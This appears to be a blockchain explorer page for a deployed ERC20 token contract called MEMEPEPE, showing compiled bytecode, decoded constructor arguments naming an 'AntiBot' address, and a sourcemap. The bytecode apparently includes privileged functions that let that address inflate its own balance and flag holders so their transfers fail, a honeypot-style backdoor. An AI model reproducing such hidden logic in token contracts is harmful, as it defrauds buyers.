0390911603610414576001600160a01b03166000908152600760205260409020805460ff19169055565b6003546001600160a01b0316336001600160a01b0316146104f757565b600354336001600160a01b03909116036103cb573360009081526001602052604090206d5be6fcd5cc81036451a2000000009055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105606109a6565b6001600160a01b0381166105c55760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610481565b61041481610a00565b6001600160a01b0383166106305760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610481565b6001600160a01b0382166106915760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610481565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fe848461052d565b9050600019811461076657818110156107595760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610481565b61076684848484036105ce565b50505050565b6001600160a01b03831660009081526007602052604090205460ff161561079257506004545b6001600160a01b0383166107f65760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610481565b6001600160a01b0382166108585760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610481565b6001600160a01b038316600090815260016020526040902054818110156108d05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610481565b6108da8183610a50565b6001600160a01b0385166000908152600160205260408120919091556008546109119060649061090b908690610a63565b90610a6f565b6001600160a01b03851660009081526001602052604090205490915061094390829061093d9086610a7b565b90610a50565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109979087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103cb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610481565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a5c8284610c08565b9392505050565b6000610a5c8284610c1b565b6000610a5c8284610c32565b6000610a5c8284610bf5565b600060208083528351808285015260005b81811015610ab457858101830151858201604001528201610a98565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aec57600080fd5b919050565b60008060408385031215610b0457600080fd5b610b0d83610ad5565b946020939093013593505050565b600080600060608486031215610b3057600080fd5b610b3984610ad5565b9250610b4760208501610ad5565b9150604084013590509250925092565b600060208284031215610b6957600080fd5b610a5c82610ad5565b60008060408385031215610b8557600080fd5b610b8e83610ad5565b9150610b9c60208401610ad5565b90509250929050565b600181811c90821680610bb957607f821691505b602082108103610bd957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561036d5761036d610bdf565b8181038181111561036d5761036d610bdf565b808202811582820484141761036d5761036d610bdf565b600082610c4f57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220120ff21145540ef41f73023d497bfe80c92310d7c34ef3eb99a835d87d80ff4464736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac8900000000000000000000000000000000000000000000000000000000000000084d454d455045504500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084d454d4550455045000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): MEMEPEPE
Arg [1] : symbol_ (string): MEMEPEPE
Arg [2] : AntiBot (address): 0xE11830006fe3D3A03e3e92F9494Be9211753aC89

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [4] : 4d454d4550455045000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [6] : 4d454d4550455045000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

9444:10897:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11083:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13386:193;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;13386:193:0;1004:187:1;12183:102:0;12263:14;;12183:102;;;1342:25:1;;;1330:2;1315:18;12183:102:0;1196:177:1;14159:287:0;;;;;;:::i;:::-;;:::i;12033:85::-;;;12108:2;1853:36:1;;1841:2;1826:18;12033:85:0;1711:184:1;14855:238:0;;;;;;:::i;:::-;;:::i;12348:119::-;;;;;;:::i;:::-;-1:-1:-1;;;;;12441:18:0;12414:7;12441:18;;;:9;:18;;;;;;;12348:119;8623:103;;;:::i;:::-;;7973:87;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;7973:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;7973:87:0;2091:203:1;10115:98:0;;;;;;:::i;:::-;-1:-1:-1;;;;;10195:10:0;10170:4;10195:10;;;:5;:10;;;;;;;;;10115:98;11296;;;:::i;9972:135::-;;;;;;:::i;:::-;;:::i;15596:424::-;;;;;;:::i;:::-;;:::i;12675:185::-;;;;;;:::i;:::-;;:::i;9824:140::-;;;;;;:::i;:::-;;:::i;10221:242::-;;;:::i;12923:143::-;;;;;;:::i;:::-;;:::i;9644:27::-;;;;;-1:-1:-1;;;;;9644:27:0;;;8881:201;;;;;;:::i;:::-;;:::i;11083:94::-;11129:13;11162:7;11155:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11083:94;:::o;13386:193::-;13461:4;6848:10;13517:32;6848:10;13533:7;13542:6;13517:8;:32::i;:::-;13567:4;13560:11;;;13386:193;;;;;:::o;14159:287::-;14282:4;6848:10;14340:38;14356:4;6848:10;14371:6;14340:15;:38::i;:::-;14389:27;14399:4;14405:2;14409:6;14389:9;:27::i;:::-;-1:-1:-1;14434:4:0;;14159:287;-1:-1:-1;;;;14159:287:0:o;14855:238::-;14943:4;6848:10;14999:64;6848:10;15015:7;15052:10;15024:25;6848:10;15015:7;15024:9;:25::i;:::-;:38;;;;:::i;:::-;14999:8;:64::i;8623:103::-;7857:15;:13;:15::i;:::-;8688:30:::1;8715:1;8688:18;:30::i;:::-;8623:103::o:0;11296:98::-;11344:13;11377:9;11370:16;;;;;:::i;9972:135::-;10028:11;;6848:10;-1:-1:-1;;;;;10028:11:0;;;:27;10024:76;;-1:-1:-1;;;;;10071:10:0;;;;;;:5;:10;;;;;:17;;-1:-1:-1;;10071:17:0;10084:4;10071:17;;;10024:76;9972:135;:::o;15596:424::-;15689:4;6848:10;15689:4;15772:25;6848:10;15789:7;15772:9;:25::i;:::-;15745:52;;15836:15;15816:16;:35;;15808:85;;;;-1:-1:-1;;;15808:85:0;;3413:2:1;15808:85:0;;;3395:21:1;3452:2;3432:18;;;3425:30;3491:34;3471:18;;;3464:62;-1:-1:-1;;;3542:18:1;;;3535:35;3587:19;;15808:85:0;;;;;;;;;15921:60;15930:5;15937:7;15965:15;15946:16;:34;15921:8;:60::i;12675:185::-;12746:4;6848:10;12802:28;6848:10;12819:2;12823:6;12802:9;:28::i;9824:140::-;9884:11;;6848:10;-1:-1:-1;;;;;9884:11:0;;;:27;9880:77;;-1:-1:-1;;;;;9927:10:0;9940:5;9927:10;;;:5;:10;;;;;:18;;-1:-1:-1;;9927:18:0;;;9824:140::o;10221:242::-;10282:11;;-1:-1:-1;;;;;10282:11:0;6848:10;-1:-1:-1;;;;;10266:27:0;;10262:194;;10221:242::o;10262:194::-;10337:11;;6848:10;-1:-1:-1;;;;;10337:11:0;;;:27;10333:123;;6848:10;10380:23;;;;:9;:23;;;;;10406:38;10380:64;;10221:242::o;12923:143::-;-1:-1:-1;;;;;13031:18:0;;;13004:7;13031:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;12923:143::o;8881:201::-;7857:15;:13;:15::i;:::-;-1:-1:-1;;;;;8970:22:0;::::1;8962:73;;;::::0;-1:-1:-1;;;8962:73:0;;3819:2:1;8962:73:0::1;::::0;::::1;3801:21:1::0;3858:2;3838:18;;;3831:30;3897:34;3877:18;;;3870:62;-1:-1:-1;;;3948:18:1;;;3941:36;3994:19;;8962:73:0::1;3617:402:1::0;8962:73:0::1;9046:28;9065:8;9046:18;:28::i;19226:380::-:0;-1:-1:-1;;;;;19362:19:0;;19354:68;;;;-1:-1:-1;;;19354:68:0;;4226:2:1;19354:68:0;;;4208:21:1;4265:2;4245:18;;;4238:30;4304:34;4284:18;;;4277:62;-1:-1:-1;;;4355:18:1;;;4348:34;4399:19;;19354:68:0;4024:400:1;19354:68:0;-1:-1:-1;;;;;19441:21:0;;19433:68;;;;-1:-1:-1;;;19433:68:0;;4631:2:1;19433:68:0;;;4613:21:1;4670:2;4650:18;;;4643:30;4709:34;4689:18;;;4682:62;-1:-1:-1;;;4760:18:1;;;4753:32;4802:19;;19433:68:0;4429:398:1;19433:68:0;-1:-1:-1;;;;;19514:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19566:32;;1342:25:1;;;19566:32:0;;1315:18:1;19566:32:0;;;;;;;19226:380;;;:::o;19897:441::-;20032:24;20059:25;20069:5;20076:7;20059:9;:25::i;:::-;20032:52;;-1:-1:-1;;20099:16:0;:37;20095:236;;20181:6;20161:16;:26;;20153:68;;;;-1:-1:-1;;;20153:68:0;;5034:2:1;20153:68:0;;;5016:21:1;5073:2;5053:18;;;5046:30;5112:31;5092:18;;;5085:59;5161:18;;20153:68:0;4832:353:1;20153:68:0;20257:51;20266:5;20273:7;20301:6;20282:16;:25;20257:8;:51::i;:::-;20021:317;19897:441;;;:::o;16515:684::-;-1:-1:-1;;;;;16641:11:0;;;;;;:5;:11;;;;;;;;16638:65;;;-1:-1:-1;12263:14:0;;16638:65;-1:-1:-1;;;;;16721:18:0;;16713:68;;;;-1:-1:-1;;;16713:68:0;;5392:2:1;16713:68:0;;;5374:21:1;5431:2;5411:18;;;5404:30;5470:34;5450:18;;;5443:62;-1:-1:-1;;;5521:18:1;;;5514:35;5566:19;;16713:68:0;5190:401:1;16713:68:0;-1:-1:-1;;;;;16800:16:0;;16792:64;;;;-1:-1:-1;;;16792:64:0;;5798:2:1;16792:64:0;;;5780:21:1;5837:2;5817:18;;;5810:30;5876:34;5856:18;;;5849:62;-1:-1:-1;;;5927:18:1;;;5920:33;5970:19;;16792:64:0;5596:399:1;16792:64:0;-1:-1:-1;;;;;16891:15:0;;16874;16891;;;:9;:15;;;;;;16925:17;;;;16917:68;;;;-1:-1:-1;;;16917:68:0;;6202:2:1;16917:68:0;;;6184:21:1;6241:2;6221:18;;;6214:30;6280:34;6260:18;;;6253:62;-1:-1:-1;;;6331:18:1;;;6324:36;6377:19;;16917:68:0;6000:402:1;16917:68:0;17014:19;:7;17026:6;17014:11;:19::i;:::-;-1:-1:-1;;;;;16996:15:0;;;;;;:9;:15;;;;;:37;;;;17071:4;;17060:25;;17081:3;;17060:16;;:6;;:10;:16::i;:::-;:20;;:25::i;:::-;-1:-1:-1;;;;;17113:13:0;;;;;;:9;:13;;;;;;17044:41;;-1:-1:-1;17113:36:0;;17044:41;;17113:25;;17131:6;17113:17;:25::i;:::-;:29;;:36::i;:::-;-1:-1:-1;;;;;17096:13:0;;;;;;;:9;:13;;;;;;;:53;;;;17165:26;;;;;;;;;;17184:6;1342:25:1;;1330:2;1315:18;;1196:177;17165:26:0;;;;;;;;16627:572;;16515:684;;;:::o;8138:134::-;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;6848:10;8204:23;8196:68;;;;-1:-1:-1;;;8196:68:0;;6609:2:1;8196:68:0;;;6591:21:1;;;6628:18;;;6621:30;6687:34;6667:18;;;6660:62;6739:18;;8196:68:0;6407:356:1;9242:191:0;9316:16;9335:6;;-1:-1:-1;;;;;9352:17:0;;;-1:-1:-1;;;;;;9352:17:0;;;;;;9385:40;;9335:6;;;;;;;9385:40;;9316:16;9385:40;9305:128;9242:191;:::o;2964:98::-;3022:7;3049:5;3053:1;3049;:5;:::i;:::-;3042:12;2964:98;-1:-1:-1;;;2964:98:0:o;3321:::-;3379:7;3406:5;3410:1;3406;:5;:::i;3720:98::-;3778:7;3805:5;3809:1;3805;:5;:::i;2583:98::-;2641:7;2668:5;2672:1;2668;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:125;3146:9;;;3167:10;;;3164:36;;;3180:18;;:::i;6768:128::-;6835:9;;;6856:11;;;6853:37;;;6870:18;;:::i;6901:168::-;6974:9;;;7005;;7022:15;;;7016:22;;7002:37;6992:71;;7043:18;;:::i;7074:217::-;7114:1;7140;7130:132;;7184:10;7179:3;7175:20;7172:1;7165:31;7219:4;7216:1;7209:15;7247:4;7244:1;7237:15;7130:132;-1:-1:-1;7276:9:1;;7074:217::o

Swarm Source

ipfs://120ff21145540ef41f73023d497bfe80c92310d7c34ef3eb99a835d87d80ff44
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.